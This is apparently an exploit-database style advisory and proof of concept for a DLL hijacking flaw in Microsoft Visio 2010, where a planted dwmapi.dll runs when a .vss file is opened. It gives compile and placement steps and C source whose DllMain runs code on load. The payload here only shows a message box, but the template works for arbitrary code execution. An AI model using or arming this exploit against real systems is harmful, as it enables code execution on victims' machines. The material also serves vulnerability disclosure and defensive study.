/* Microsoft Visio 2010 v14.0.4514.1004 (dwmapi.dll) DLL Hijacking Exploit Vendor: Microsoft Corp. Product Web Page: http://www.microsoft.com Affected Version: 14.0.4514.1004 MSO (14.0.4536.1000) Summary: Microsoft Visio is a diagramming program for Microsoft Windows that uses vector graphics to create diagrams. Desc: MS Visio 2010 suffers from a dll hijacking vulnerability that enables the attacker to execute arbitrary code on a local level. The vulnerable extension is .vss thru dwmapi.dll library. ---- gcc -shared -o dwmapi.dll msvisio.c Compile and rename to dwmapi.dll, create a file test.vss and put both files in same dir and execute. ---- Tested on Microsoft Windows XP Professional SP3 (EN) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm gmail com Zero Science Lab - http://www.zeroscience.mk 26.08.2010 */ #include BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: dll_mll(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int dll_mll() { MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK); }